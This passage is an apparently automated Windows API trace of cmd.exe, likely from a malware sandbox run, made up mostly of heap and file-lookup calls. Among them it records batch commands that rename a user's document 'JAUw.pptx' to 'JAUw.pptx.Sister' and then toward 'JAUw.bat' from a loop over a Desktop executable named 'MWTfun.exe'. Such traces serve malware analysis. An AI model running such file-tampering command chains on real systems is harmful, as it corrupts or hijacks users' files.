lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4f6ac40, ftCreationTime.dwHighDateTime=0x1d5707f, ftLastAccessTime.dwLowDateTime=0xf7e46680, ftLastAccessTime.dwHighDateTime=0x1d5b4ec, ftLastWriteTime.dwLowDateTime=0xf7e46680, ftLastWriteTime.dwHighDateTime=0x1d5b4ec, nFileSizeHigh=0x0, nFileSizeLow=0x7197, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="JAUw.pptx", cAlternateFileName="")) returned 1 [0304.551] GetProcessHeap () returned 0x21ed8c70000 [0304.551] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x124) returned 0x21ed8c758a0 [0304.551] GetProcessHeap () returned 0x21ed8c70000 [0304.551] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x124 [0304.551] GetProcessHeap () returned 0x21ed8c70000 [0304.551] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58980 [0304.552] GetProcessHeap () returned 0x21ed8c70000 [0304.552] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58980, Size=0x30) returned 0x21ed8d58980 [0304.552] GetProcessHeap () returned 0x21ed8c70000 [0304.552] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58980) returned 0x30 [0304.552] GetProcessHeap () returned 0x21ed8c70000 [0304.552] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d589c0 [0304.552] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.552] GetProcessHeap () returned 0x21ed8c70000 [0304.552] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45ce0 [0304.552] ??_V@YAXPEAX@Z () returned 0x1 [0304.552] GetProcessHeap () returned 0x21ed8c70000 [0304.552] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d589c0, Size=0x110) returned 0x21ed8d589c0 [0304.552] GetProcessHeap () returned 0x21ed8c70000 [0304.552] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d589c0) returned 0x110 [0304.552] GetProcessHeap () returned 0x21ed8c70000 [0304.552] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58ae0 [0304.553] GetProcessHeap () returned 0x21ed8c70000 [0304.553] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58ae0, Size=0x290) returned 0x21ed8d58ae0 [0304.553] GetProcessHeap () returned 0x21ed8c70000 [0304.553] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58ae0) returned 0x290 [0304.553] GetProcessHeap () returned 0x21ed8c70000 [0304.553] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58d80 [0304.553] GetProcessHeap () returned 0x21ed8c70000 [0304.553] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58d80, Size=0x30) returned 0x21ed8d58d80 [0304.553] GetProcessHeap () returned 0x21ed8c70000 [0304.553] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58d80) returned 0x30 [0304.553] GetProcessHeap () returned 0x21ed8c70000 [0304.553] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d58dc0 [0304.553] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.553] GetProcessHeap () returned 0x21ed8c70000 [0304.553] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45b60 [0304.553] ??_V@YAXPEAX@Z () returned 0x1 [0304.553] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.553] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7960 [0304.554] FindClose (in: hFindFile=0x21ed8cc7960 | out: hFindFile=0x21ed8cc7960) returned 1 [0304.554] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc72a0 [0304.554] FindClose (in: hFindFile=0x21ed8cc72a0 | out: hFindFile=0x21ed8cc72a0) returned 1 [0304.554] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe019f371, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe019f371, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc7060 [0304.554] FindClose (in: hFindFile=0x21ed8cc7060 | out: hFindFile=0x21ed8cc7060) returned 1 [0304.554] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0304.554] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\JAUw.pptx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4f6ac40, ftCreationTime.dwHighDateTime=0x1d5707f, ftLastAccessTime.dwLowDateTime=0xf7e46680, ftLastAccessTime.dwHighDateTime=0x1d5b4ec, ftLastWriteTime.dwLowDateTime=0xf7e46680, ftLastWriteTime.dwHighDateTime=0x1d5b4ec, nFileSizeHigh=0x0, nFileSizeLow=0x7197, dwReserved0=0x4, dwReserved1=0x7, cFileName="JAUw.pptx", cAlternateFileName="JAUW~1.PPT")) returned 0x21ed8cc7e40 [0304.557] FindClose (in: hFindFile=0x21ed8cc7e40 | out: hFindFile=0x21ed8cc7e40) returned 1 [0304.557] _wcsnicmp (_String1="JAUW~1.PP", _String2="JAUw.pptx", _MaxCount=0x9) returned 80 [0304.557] malloc (_Size=0x1ff9c) returned 0x21eda1bfe80 [0304.558] ??_V@YAXPEAX@Z () returned 0x21eda1bfe80 [0304.559] GetProcessHeap () returned 0x21ed8c70000 [0304.559] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1a) returned 0x21ed8d45e60 [0304.560] ??_V@YAXPEAX@Z () returned 0x1 [0304.560] ??_V@YAXPEAX@Z () returned 0x1 [0304.560] GetProcessHeap () returned 0x21ed8c70000 [0304.560] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d58dc0, Size=0x108) returned 0x21ed8d58dc0 [0304.560] GetProcessHeap () returned 0x21ed8c70000 [0304.560] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d58dc0) returned 0x108 [0304.560] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0304.560] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.560] GetFileType (hFile=0x50) returned 0x2 [0304.560] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.560] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0304.562] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.562] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0304.567] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.567] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.567] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0304.567] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.567] GetFileType (hFile=0x50) returned 0x2 [0304.567] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.567] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0304.568] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.568] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0304.568] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.568] GetFileType (hFile=0x50) returned 0x2 [0304.568] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.569] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.569] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.569] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d58990*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d58990*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.569] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"JAUw.pptx\" \"JAUw.pptx.Sister\" ") returned 32 [0304.569] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.569] GetFileType (hFile=0x50) returned 0x2 [0304.569] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.570] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.570] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.570] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0304.570] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0304.570] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.570] GetFileType (hFile=0x50) returned 0x2 [0304.571] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.571] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.573] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.573] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.573] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0304.573] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.573] GetFileType (hFile=0x50) returned 0x2 [0304.573] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.573] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.574] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.574] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0304.574] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0304.574] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.574] GetFileType (hFile=0x50) returned 0x2 [0304.574] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.574] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.575] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.575] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0304.575] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0304.575] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.575] GetFileType (hFile=0x50) returned 0x2 [0304.575] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.575] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.576] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.576] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0304.580] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.581] GetFileType (hFile=0x50) returned 0x2 [0304.581] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.581] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0304.583] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.583] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d58d90*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d58d90*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0304.583] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"JAUw.pptx.Sister\" \"JAUw.bat\" ") returned 31 [0304.583] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.583] GetFileType (hFile=0x50) returned 0x2 [0304.583] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.583] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0304.584] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.584] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x1f, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x1f) returned 1 [0304.584] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0304.584] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.584] GetFileType (hFile=0x50) returned 0x2 [0304.584] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.584] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0304.585] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.585] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0304.603] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.603] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.603] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.603] malloc (_Size=0xffce) returned 0x21eda1bfe80 [0304.604] ??_V@YAXPEAX@Z () returned 0x21eda1bfe80 [0304.604] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.604] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.604] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.604] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.604] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.604] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.604] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.604] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.604] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.604] ??_V@YAXPEAX@Z () returned 0x1 [0304.604] GetProcessHeap () returned 0x21ed8c70000 [0304.604] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d45580 [0304.604] GetProcessHeap () returned 0x21ed8c70000 [0304.604] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45580, Size=0x50) returned 0x21ed8cc7a20 [0304.604] GetProcessHeap () returned 0x21ed8c70000 [0304.605] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc7a20) returned 0x50 [0304.605] GetProcessHeap () returned 0x21ed8c70000 [0304.605] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7660 [0304.605] GetProcessHeap () returned 0x21ed8c70000 [0304.605] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d44900 [0304.605] GetProcessHeap () returned 0x21ed8c70000 [0304.605] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44900, Size=0x50) returned 0x21ed8cc7360 [0304.605] GetProcessHeap () returned 0x21ed8c70000 [0304.605] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc7360) returned 0x50 [0304.605] malloc (_Size=0xffce) returned 0x21eda1bfe80 [0304.605] ??_V@YAXPEAX@Z () returned 0x21eda1bfe80 [0304.605] GetProcessHeap () returned 0x21ed8c70000 [0304.605] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7ea0 [0304.605] GetProcessHeap () returned 0x21ed8c70000 [0304.605] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937d470 [0304.605] _wcsicmp (_String1="JAUw.pptx", _String2=".") returned 60 [0304.605] _wcsicmp (_String1="JAUw.pptx", _String2="..") returned 60 [0304.605] GetFileAttributesW (lpFileName="JAUw.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\jauw.pptx")) returned 0x20 [0304.607] GetProcessHeap () returned 0x21ed8c70000 [0304.607] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9290070 [0304.609] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9290080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.609] SetErrorMode (uMode=0x0) returned 0x0 [0304.609] SetErrorMode (uMode=0x1) returned 0x0 [0304.609] GetFullPathNameW (in: lpFileName="JAUw.pptx", nBufferLength=0x7fe7, lpBuffer=0x21eda1bfe80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\JAUw.pptx", lpFilePart=0xa6cf4fd660*="JAUw.pptx") returned 0x23 [0304.609] SetErrorMode (uMode=0x0) returned 0x1 [0304.609] GetProcessHeap () returned 0x21ed8c70000 [0304.609] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5ac70 [0304.609] _wcsicmp (_String1="JAUw.pptx", _String2=".") returned 60 [0304.609] _wcsicmp (_String1="JAUw.pptx", _String2="..") returned 60 [0304.609] GetFileAttributesW (lpFileName="JAUw.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\jauw.pptx")) returned 0x20 [0304.610] ??_V@YAXPEAX@Z () returned 0x1 [0304.610] malloc (_Size=0xffce) returned 0x21eda1bfe80 [0304.610] ??_V@YAXPEAX@Z () returned 0x21eda1bfe80 [0304.610] malloc (_Size=0xffce) returned 0x21eda1cfe60 [0304.610] ??_V@YAXPEAX@Z () returned 0x21eda1cfe60 [0304.614] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\JAUw.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\jauw.pptx")) returned 0x20 [0304.614] malloc (_Size=0xffce) returned 0x21ed993f900 [0304.614] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.614] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\JAUw.pptx", fInfoLevelId=0x1, lpFindFileData=0x21ed937d480, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed937d480) returned 0x21ed8cc78a0 [0304.615] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0304.615] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0304.615] ??_V@YAXPEAX@Z () returned 0x1 [0304.615] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\JAUw.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\jauw.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\JAUw.pptx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\jauw.pptx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0304.617] FindNextFileW (in: hFindFile=0x21ed8cc78a0, lpFindFileData=0x21ed937d480 | out: lpFindFileData=0x21ed937d480*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4f6ac40, ftCreationTime.dwHighDateTime=0x1d5707f, ftLastAccessTime.dwLowDateTime=0xf7e46680, ftLastAccessTime.dwHighDateTime=0x1d5b4ec, ftLastWriteTime.dwLowDateTime=0xf7e46680, ftLastWriteTime.dwHighDateTime=0x1d5b4ec, nFileSizeHigh=0x0, nFileSizeLow=0x7197, dwReserved0=0x0, dwReserved1=0x0, cFileName="JAUw.pptx", cAlternateFileName="")) returned 0 [0304.619] GetLastError () returned 0x12 [0304.619] FindClose (in: hFindFile=0x21ed8cc78a0 | out: hFindFile=0x21ed8cc78a0) returned 1 [0304.619] ??_V@YAXPEAX@Z () returned 0x1 [0304.619] ??_V@YAXPEAX@Z () returned 0x1 [0304.619] ??_V@YAXPEAX@Z () returned 0x1 [0304.619] ??_V@YAXPEAX@Z () returned 0x1 [0304.619] GetProcessHeap () returned 0x21ed8c70000 [0304.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7b40 [0304.619] GetProcessHeap () returned 0x21ed8c70000 [0304.619] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95ac0, Size=0x16) returned 0x21ed8c95500 [0304.619] GetProcessHeap () returned 0x21ed8c70000 [0304.619] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95500) returned 0x16 [0304.619] GetProcessHeap () returned 0x21ed8c70000 [0304.619] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45cb0, Size=0x20) returned 0x21ed8d45d10 [0304.619] GetProcessHeap () returned 0x21ed8c70000 [0304.619] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45d10) returned 0x20 [0304.619] GetProcessHeap () returned 0x21ed8c70000 [0304.619] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d617c0 [0304.620] GetProcessHeap () returned 0x21ed8c70000 [0304.620] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d617c0, Size=0xb2) returned 0x21ed93b66f0 [0304.620] GetProcessHeap () returned 0x21ed8c70000 [0304.620] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b66f0) returned 0xb2 [0304.620] GetProcessHeap () returned 0x21ed8c70000 [0304.620] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d29680 [0304.620] GetProcessHeap () returned 0x21ed8c70000 [0304.620] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d29680, Size=0x30) returned 0x21ed8d29680 [0304.620] GetProcessHeap () returned 0x21ed8c70000 [0304.620] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d29680) returned 0x30 [0304.620] GetProcessHeap () returned 0x21ed8c70000 [0304.620] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d296c0 [0304.621] malloc (_Size=0x1ff9c) returned 0x21eda1bfe80 [0304.621] GetProcessHeap () returned 0x21ed8c70000 [0304.621] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b4d70 [0304.622] GetProcessHeap () returned 0x21ed8c70000 [0304.622] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b6030 [0304.622] ??_V@YAXPEAX@Z () returned 0x1 [0304.622] malloc (_Size=0x1ff9c) returned 0x21eda1bfe80 [0304.622] GetProcessHeap () returned 0x21ed8c70000 [0304.622] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b5730 [0304.622] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda1bfe80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0304.622] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, 